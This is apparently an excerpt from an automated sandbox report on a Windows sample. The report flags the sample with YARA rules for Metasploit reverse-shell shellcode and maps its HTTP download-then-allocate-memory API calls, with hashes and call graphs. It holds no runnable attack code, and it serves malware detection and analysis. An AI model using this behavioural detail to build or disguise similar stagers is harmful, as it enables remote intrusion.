                            • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                            Reputation: low
                            Has exited: true

                            Target ID: 4
                            Start time: 04:53:46
                            Start date: 13/03/2025
                            Path: C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\system32\WerFault.exe -u -p 7004 -s 1076
                            Imagebase: 0x7ff7dcb80000
                            File size: 570'736 bytes
                            MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            Execution Graph

                            Execution Coverage: 34.2%
                            Dynamic/Decrypted Code Coverage: 0%
                            Signature Coverage: 0%
                            Total number of Nodes: 12
                            Total number of Limit Nodes: 1

                            Execution graph (node id: address and API called; then the recorded edges between node ids):
                            52: 140004161 InternetOpenA; 53: 140004186; edges: 52 -> 53
                            59: 140004245 HttpOpenRequestA; 62: 140004272; 60: 1400042f4 VirtualAlloc; 61: 140004319 InternetReadFile; 63: 140004347; edges: 59 -> 62, 60 -> 61, 61 -> 62, 62 -> 60, 62 -> 61, 62 -> 63
                            54: 14000424b HttpOpenRequestA; 57: 140004272; 55: 1400042f4 VirtualAlloc; 56: 140004319 InternetReadFile; 58: 140004347; edges: 54 -> 57, 55 -> 56, 56 -> 57, 57 -> 55, 57 -> 56, 57 -> 58

                            Callgraph

                            Functions in the call graph:
                            • Function_0000000140004161
                            • Function_0000000140004245
                            • Function_000000014000424B
                            • Function_0000000140004000

                            Executed Functions

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000001.00000002.1865831202.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_140000000_443_2003_https-df.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocFileInternetReadVirtual
                            • String ID:
                            • API String ID: 3591508208-0
                            • Opcode ID: d12b91be1f377b51e2d5e9a127600f2aa2d3ef4ff5cd3ffab96600ccc3195469
                            • Instruction ID: 00beb425c6c815f18323cc53832ec41728588e8003292604363aacf73a5263bb
                            • Opcode Fuzzy Hash: d12b91be1f377b51e2d5e9a127600f2aa2d3ef4ff5cd3ffab96600ccc3195469
                            • Instruction Fuzzy Hash: E11125F130028959FB1393A7BE36BF911486B48FC4F894020BF055B6E2F9288690824C

                            Control-flow Graph

                            APIs
                            • HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000,?,00000000), ref: 000000014000426A
                              • Part of subcall function 00000001400042B6: VirtualAlloc.KERNELBASE ref: 0000000140004310
                              • Part of subcall function 00000001400042B6: InternetReadFile.WININET(00000000,00000000), ref: 0000000140004333
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000001.00000002.1865831202.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_140000000_443_2003_https-df.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                            • String ID: A$U.;
                            • API String ID: 1187293180-4043418643
                            • Opcode ID: b63501966926f8b01a0b9fc76b6447a0cee4866ebbb465211c8b40e6c4fe0d8d
                            • Instruction ID: be4982e0a486cb758df7c19ec863a11ba1af1556f481e9f2047e650850e32e87
                            • Opcode Fuzzy Hash: b63501966926f8b01a0b9fc76b6447a0cee4866ebbb465211c8b40e6c4fe0d8d
                            • Instruction Fuzzy Hash: A001F5F23002886DF712C6B7A921FBD2715B359FD0F8E5060BF055B6E2E9189A448209

                            Control-flow Graph

                            APIs
                            • HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000,?,00000000), ref: 000000014000426A
                              • Part of subcall function 00000001400042B6: VirtualAlloc.KERNELBASE ref: 0000000140004310
                              • Part of subcall function 00000001400042B6: InternetReadFile.WININET(00000000,00000000), ref: 0000000140004333
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000001.00000002.1865831202.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_140000000_443_2003_https-df.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                            • String ID: U.;
                            • API String ID: 1187293180-4213443877
                            • Opcode ID: 29627bb30cf452fdd34bce20e3faa6157c3b1128fe2c696f56fdbffadd6dbd22
                            • Instruction ID: 5f6e67efc3cbf756900b841172bea2473cedc1d77852a62045df7e1721ddbbb2
                            • Opcode Fuzzy Hash: 29627bb30cf452fdd34bce20e3faa6157c3b1128fe2c696f56fdbffadd6dbd22
                            • Instruction Fuzzy Hash: 0B0126F13002486CFB12C2B76D22FFD26587399FD4F8D5120BF064B6E2F9188A44410D

                            Control-flow Graph

                            Basic block 140004161-140004181 (InternetOpenA, call 14000418f) -> basic block 140004186-14000419a
                            APIs
                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 000000014000417F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000001.00000002.1865831202.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_140000000_443_2003_https-df.jbxd
                            Yara matches
                            Similarity
                            • API ID: InternetOpen
                            • String ID: good.com
                            • API String ID: 2038078732-2365120828
                            • Opcode ID: 7253203620dcd85dad3777c5ea19a150f91156b95e1f59e9db5f4b304c0b6218
                            • Instruction ID: 0dc344e9eccd43810a061d402c5a282636e792987776bae9b9dd0be3df35d1d3
                            • Opcode Fuzzy Hash: 7253203620dcd85dad3777c5ea19a150f91156b95e1f59e9db5f4b304c0b6218
                            • Instruction Fuzzy Hash: 1EE0C2B31483C11BF35297A86B71BCD3B25AB17F44F089026AF4043282EA151AA4C105